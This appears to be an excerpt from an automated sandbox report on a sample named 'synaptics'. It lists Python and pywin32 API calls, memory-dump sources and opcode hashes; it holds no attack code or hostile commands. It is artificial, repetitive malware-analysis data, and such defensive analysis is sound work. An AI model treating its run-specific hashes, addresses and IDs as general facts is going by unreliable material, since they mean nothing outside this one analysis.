                                                                                                                                                                                                              • String ID: AddAuditAccessAceEx not supported by this version of Windows$The object is not a PySID object$lllOii:AddAuditAccessAceEx
                                                                                                                                                                                                              • API String ID: 901859003-2795173328
                                                                                                                                                                                                              • Opcode ID: 0bcf232cf5e1dd499661a469926c19bdad06e7db9d6d7fdbd106f9a5626946d9
                                                                                                                                                                                                              • Instruction ID: 1583f353c8feb171713ab5a7e00eca65e1a8cc3e0383d51ed02b7de9a98bd6c9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0bcf232cf5e1dd499661a469926c19bdad06e7db9d6d7fdbd106f9a5626946d9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7118233424204AFD701EB44DD44E977BECFB59215F4446A6F948D2137DB36E628CBA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,lO:AddAccessDeniedAce,?,?), ref: 6BF42636
                                                                                                                                                                                                              • PyErr_Clear.PYTHON310 ref: 6BF4264D
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,llO:AddAccessDeniedAce,?,?,?), ref: 6BF4266B
                                                                                                                                                                                                                • Part of subcall function 6BF42400: PyErr_Format.PYTHON310(6C7EB154,%s not supported by this version of Windows,AddAccesAllowedAce,?,?,?,?), ref: 6BF42423
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_Err_ParseTuple$ClearFormat
                                                                                                                                                                                                              • String ID: AddAccesDeniedAce$lO:AddAccessDeniedAce$llO:AddAccessDeniedAce
                                                                                                                                                                                                              • API String ID: 1510928575-45297876
                                                                                                                                                                                                              • Opcode ID: 4cb26035b4b8a1f196f15f1ffac2ae03bead21e69212527fe22093f54919e412
                                                                                                                                                                                                              • Instruction ID: 0336fea6c4c0aa940f1946dbaa6f6273513ad4f5da16fd48e0e542628af1df71
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4cb26035b4b8a1f196f15f1ffac2ae03bead21e69212527fe22093f54919e412
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17014FB7414201BFD700AB54DD4596B7BE8EB98204F404869F899C1136E636CA18DB53
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,lO:AddAccessAllowedAce,?,?), ref: 6BF425A6
                                                                                                                                                                                                              • PyErr_Clear.PYTHON310 ref: 6BF425BD
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,llO:AddAccessAllowedAce,?,?,?), ref: 6BF425DB
                                                                                                                                                                                                                • Part of subcall function 6BF42400: PyErr_Format.PYTHON310(6C7EB154,%s not supported by this version of Windows,AddAccesAllowedAce,?,?,?,?), ref: 6BF42423
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_Err_ParseTuple$ClearFormat
                                                                                                                                                                                                              • String ID: AddAccesAllowedAce$lO:AddAccessAllowedAce$llO:AddAccessAllowedAce
                                                                                                                                                                                                              • API String ID: 1510928575-648165593
                                                                                                                                                                                                              • Opcode ID: 57f7643e91e0a86e2cb7d9175180dae80e1fa0e1b78c84181e8a544d2d15b1d8
                                                                                                                                                                                                              • Instruction ID: 2d939425a8d9fd29e69279c719a1821bac1117a59b7abd7bedebadaddf5f2447
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 57f7643e91e0a86e2cb7d9175180dae80e1fa0e1b78c84181e8a544d2d15b1d8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9014FB7414201AFD700AB14DD41A6F7BE8FB48304F404865F999C1136E63ADA189B63
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,:GetSecurityDescriptorOwner), ref: 6BF46C8C
                                                                                                                                                                                                              • GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 6BF46CAE
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(GetSecurityDescriptorOwner,00000000), ref: 6BF46CBE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • GetSecurityDescriptorOwner, xrefs: 6BF46CB9
                                                                                                                                                                                                              • :GetSecurityDescriptorOwner, xrefs: 6BF46C83
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_DescriptorError@@OwnerParseSecurityTupleU_object@@Win_
                                                                                                                                                                                                              • String ID: :GetSecurityDescriptorOwner$GetSecurityDescriptorOwner
                                                                                                                                                                                                              • API String ID: 1358610373-1512101531
                                                                                                                                                                                                              • Opcode ID: ce15adefeffce6ed55b0d94cd7a67c46a2d457718b5422ecdb680c9b6aacbac3
                                                                                                                                                                                                              • Instruction ID: f6dead828dd5d9035189cd78ff537b4615debebcbe270584c22c7a0098f94f59
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce15adefeffce6ed55b0d94cd7a67c46a2d457718b5422ecdb680c9b6aacbac3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3DF01DB6914101AFDB01EB24ED05A1A7BE4EB64706F4448B8F94991232F63A992CDB63
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyLong_AsVoidPtr.PYTHON310 ref: 6BF49DC8
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310 ref: 6BF49DD7
                                                                                                                                                                                                              • PyErr_Clear.PYTHON310 ref: 6BF49DE1
                                                                                                                                                                                                              • ?PyWinLong_AsVoidPtr@@YAHPAU_object@@PAPAX@Z.PYWINTYPES310 ref: 6BF49DE9
                                                                                                                                                                                                                • Part of subcall function 6BF4AA60: PyNumber_Long.PYTHON310(?,?,?,?,6BF4443E,?,?,6BF443B3,?,?), ref: 6BF4AA68
                                                                                                                                                                                                                • Part of subcall function 6BF4AA60: PyErr_Occurred.PYTHON310(?), ref: 6BF4AA7D
                                                                                                                                                                                                                • Part of subcall function 6BF4AA60: PyErr_Format.PYTHON310(6C7E9584,Unable to convert %s to pointer-sized value,6BF4F284), ref: 6BF4AA95
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,WPARAM is simple, so must be an int object (got %s),?), ref: 6BF49E07
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • WPARAM is simple, so must be an int object (got %s), xrefs: 6BF49E00
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$FormatLong_OccurredVoid$ClearLongNumber_Ptr@@U_object@@
                                                                                                                                                                                                              • String ID: WPARAM is simple, so must be an int object (got %s)
                                                                                                                                                                                                              • API String ID: 311826559-3057595559
                                                                                                                                                                                                              • Opcode ID: e4e972534bbab39bbc955be5eff45b5c48e3dfca70143cb2272affb7582eed12
                                                                                                                                                                                                              • Instruction ID: af78f04e0f19c16a4e48973b179cce1e31c335881d68c8371411b5218d2e3bab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4e972534bbab39bbc955be5eff45b5c48e3dfca70143cb2272affb7582eed12
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54F0BB73B201119FEB006B559E49A567BA4EF993227044075F505C2233DB25D929C771
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Py_BuildValue.PYTHON310((i),00000000,00000000,6BF48551,00000000), ref: 6BF48ABA
                                                                                                                                                                                                              • PyErr_Clear.PYTHON310 ref: 6BF48AE7
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,invalid timestamp), ref: 6BF48AFA
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6BF48B09
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$BuildClearDeallocStringValue
                                                                                                                                                                                                              • String ID: (i)$invalid timestamp
                                                                                                                                                                                                              • API String ID: 3614533335-2037815563
                                                                                                                                                                                                              • Opcode ID: 4e7c5b833c28a0cfe911857b9977de78ee392d4ee92202288950153fb81cafd7
                                                                                                                                                                                                              • Instruction ID: 2092fbcfc81d1f12b20c0e2014d60c16cdfe0babbe0ece0394e61555cd884736
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e7c5b833c28a0cfe911857b9977de78ee392d4ee92202288950153fb81cafd7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81F0B4779201216BCB15EB68EC08F853FE0EB9A331B054254F90482277E629996EC7F1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyLong_AsVoidPtr.PYTHON310(?), ref: 6BF4AC67
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310 ref: 6BF4AC76
                                                                                                                                                                                                              • PyErr_Clear.PYTHON310 ref: 6BF4AC80
                                                                                                                                                                                                              • ?PyWinLong_AsVoidPtr@@YAHPAU_object@@PAPAX@Z.PYWINTYPES310(?,?), ref: 6BF4AC8B
                                                                                                                                                                                                                • Part of subcall function 6BF4AA60: PyNumber_Long.PYTHON310(?,?,?,?,6BF4443E,?,?,6BF443B3,?,?), ref: 6BF4AA68
                                                                                                                                                                                                                • Part of subcall function 6BF4AA60: PyErr_Occurred.PYTHON310(?), ref: 6BF4AA7D
                                                                                                                                                                                                                • Part of subcall function 6BF4AA60: PyErr_Format.PYTHON310(6C7E9584,Unable to convert %s to pointer-sized value,6BF4F284), ref: 6BF4AA95
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,WPARAM is simple, so must be an int object (got %s),?), ref: 6BF4ACA9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • WPARAM is simple, so must be an int object (got %s), xrefs: 6BF4ACA2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$FormatLong_OccurredVoid$ClearLongNumber_Ptr@@U_object@@
                                                                                                                                                                                                              • String ID: WPARAM is simple, so must be an int object (got %s)
                                                                                                                                                                                                              • API String ID: 311826559-3057595559
                                                                                                                                                                                                              • Opcode ID: 62b79394dadb9772cb993d253c69bafaaed6f69f3747e4b0c5bbc51d236a3410
                                                                                                                                                                                                              • Instruction ID: 07cdadc6629af2081f79ad39fcc68c757f98aa5c7f12735306bfe615f63fbfbb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62b79394dadb9772cb993d253c69bafaaed6f69f3747e4b0c5bbc51d236a3410
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2F09037A242219BDB41EF64E808A4A7BE4EF99311B044474F905C3236E729D6198B62
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsValidSid.ADVAPI32(?), ref: 6BF47B28
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,GetSidIdentifierAuthority: Invalid SID in object), ref: 6BF47B3E
                                                                                                                                                                                                              • GetSidIdentifierAuthority.ADVAPI32(?), ref: 6BF47B4E
                                                                                                                                                                                                              • _Py_BuildValue_SizeT.PYTHON310((BBBBBB),?,?,?,?,?,?), ref: 6BF47B76
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • (BBBBBB), xrefs: 6BF47B71
                                                                                                                                                                                                              • GetSidIdentifierAuthority: Invalid SID in object, xrefs: 6BF47B37
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AuthorityBuildErr_IdentifierSizeStringValidValue_
                                                                                                                                                                                                              • String ID: (BBBBBB)$GetSidIdentifierAuthority: Invalid SID in object
                                                                                                                                                                                                              • API String ID: 2215780243-3761804006
                                                                                                                                                                                                              • Opcode ID: bb083d23afb84668f2412e4e50920dbc7249ee2d6a428f58425960fd94923f8d
                                                                                                                                                                                                              • Instruction ID: 9e7569c7fed0522c1a7af13e69cde13d151e6c955d744d1dcd8c3886e18733f0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb083d23afb84668f2412e4e50920dbc7249ee2d6a428f58425960fd94923f8d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CCF0B4B20380A06FC70E6B69EC5CD727FE49F1A30230D45D9F59A86037C219DA799B34
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: c7e99bcc751257dfa2ffdd7ab15d6e36f3c0cee7edbb32ce60d0ed04b4bfcf9c
                                                                                                                                                                                                              • Instruction ID: a583c387a50eea1ce7d14bd5c887a38d041517863001315a77cfc61946d91851
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7e99bcc751257dfa2ffdd7ab15d6e36f3c0cee7edbb32ce60d0ed04b4bfcf9c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C51D577A00215ABCB008F59EC81766BBB5EF85725F4540B9FC085B321E73AE91D87E2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyList_New.PYTHON310(00000000), ref: 6BF4944C
                                                                                                                                                                                                              • PyList_Append.PYTHON310(00000000,00000000), ref: 6BF4949B
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6BF494B5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: List_$AppendDealloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1573934073-0
                                                                                                                                                                                                              • Opcode ID: 71d434dde5b02b13ec333f98f8622a73326777e1ad2b51cabba5d906ba832283
                                                                                                                                                                                                              • Instruction ID: 13b7a1adb373da2a5f80d8b6745bff9d778b96c44688d9083a64c22207601f39
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 71d434dde5b02b13ec333f98f8622a73326777e1ad2b51cabba5d906ba832283
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94210737B142018FCB14DF18DE84BA37B74EB56325B148AA8DC1A43673FF29D919C661
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyList_New.PYTHON310(00000000), ref: 6BF4953C
                                                                                                                                                                                                              • PyBytes_FromStringAndSize.PYTHON310(?,?), ref: 6BF49562
                                                                                                                                                                                                              • PyList_Append.PYTHON310(00000000,00000000), ref: 6BF49573
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6BF4958D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: List_$AppendBytes_DeallocFromSizeString
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3583985797-0
                                                                                                                                                                                                              • Opcode ID: b32f8fea5e83dade6ac7b1e3971388d88d1e422e2197967ba44f1809819af433
                                                                                                                                                                                                              • Instruction ID: 93362a4b3f6203c0fb94c52d54118ebc327c4cb696cd3b3b3c7b6ca1551f07c7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b32f8fea5e83dade6ac7b1e3971388d88d1e422e2197967ba44f1809819af433
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B213833B142014FCB209F24DEC8A963FF8DB4722572092A9DC5683667FF1AD50AC661
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyMem_Malloc.PYTHON310(?), ref: 6C0A13A2
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C0A13BC
                                                                                                                                                                                                              • PyType_GenericAlloc.PYTHON310(6C0B6308,00000000,00000000,?,?), ref: 6C0A13C8
                                                                                                                                                                                                              • PyMem_Free.PYTHON310(00000000), ref: 6C0A13D8
                                                                                                                                                                                                              • _PyObject_New.PYTHON310(6C0B5D90), ref: 6C0A13FE
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A145E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Mem_$AllocDeallocFreeGenericMallocObject_Type_memcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2690798997-0
                                                                                                                                                                                                              • Opcode ID: 4b4c43370addeab61561ecb1a25df01590a7c0768ae69025ca21eb6996e9fbc7
                                                                                                                                                                                                              • Instruction ID: 23ac78eb207fe0395fcf503f694699d664f8fd3c969c2d30d4c47bdd1e414263
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4b4c43370addeab61561ecb1a25df01590a7c0768ae69025ca21eb6996e9fbc7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3921F1716043018FDB008FE9E880756B7F8EF45629F24897AE55ECAA02DB73D4438B90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6BF4B367
                                                                                                                                                                                                              • PyThreadState_Delete.PYTHON310(00000000), ref: 6BF4B37B
                                                                                                                                                                                                              • TlsSetValue.KERNEL32(00000000), ref: 6BF4B38C
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 6BF4B393
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(04843861), ref: 6BF4B3B8
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(04843A39), ref: 6BF4B3D6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DeallocValue$DeleteFreeLocalState_Thread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1066789969-0
                                                                                                                                                                                                              • Opcode ID: 86205d5e322fefcb824fd82ba24dda846b5d59ce41c194b1a855668e0d27fc64
                                                                                                                                                                                                              • Instruction ID: 11367deffee55f14cb74e8af2c811fa6129d05bed3f3731eb3160fb4b20f144e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86205d5e322fefcb824fd82ba24dda846b5d59ce41c194b1a855668e0d27fc64
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16018BB28203118BEF019F69E8447553FF8FB22324F000A50D961922B7D734D439CF61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyEval_SaveThread.PYTHON310 ref: 6C0AAA67
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 6C0AAA72
                                                                                                                                                                                                              • PyEval_RestoreThread.PYTHON310(00000000), ref: 6C0AAA7D
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6C0AAA93
                                                                                                                                                                                                              • PyEval_RestoreThread.PYTHON310(00000000), ref: 6C0AAA9C
                                                                                                                                                                                                              • PyErr_SetFromWindowsErr.PYTHON310(00000000), ref: 6C0AAAA3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Eval_Thread$Restore$Err_ErrorFreeFromLastLibrarySaveWindows
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4080689175-0
